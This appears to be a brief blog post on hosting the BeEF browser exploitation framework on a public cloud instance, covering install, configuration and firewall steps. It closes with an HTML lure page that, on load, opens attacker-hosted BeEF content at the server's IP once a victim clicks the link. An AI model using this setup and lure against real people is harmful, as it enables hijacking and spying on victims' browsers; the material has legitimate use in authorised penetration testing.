I found running BeEF from Kali VirtualBox inconvenient because it requires port forwarding from VMnet, then LAN uggh… You’d really want to connect directly with BeEF. So there.
- Get Ubuntu or other Debian instance. Red Hat (ie Amazon instance is missing some dependancies).
- Follow https://github.com/beefproject/beef/wiki/installation. Make sure to install Ruby. You can just do
sudo apt-get install ruby-full - Move to beef directory and
./install - Add your instance public IP to
config.yamlfor “Host Name / Domain Name”
- Don’t forget to add port 3000 to security rules on the instance
- When you run beEF locally the default login/pass is beef/beef but because we set it to be accessible via public IP, the more complex password will be autogenerated at the start
- Go to
http://<IP>:3000/ui/panelto confirm that 🍖 is running
Here is a basic example how to open a malicious page once the link with the beEF script has been clicked:
<!DOCTYPE html>
<html>
<head>
<title>browser exploit test</title>
<script type="text/javascript">
var win2=window.open("http://<IP>:3000/demos/butcher/index.html")
</script>
</head>
<body></body>
</html>
Happy hacking!
Bitcoin tip jar: bc1qgpl6lhf09j6kcdvkh8cz90p4cfxuyfec3ecjrd
Ethereum tip jar: 0x7e0Bf6D50b5F5fcbf76A16Bd5285CE0c74C063a9
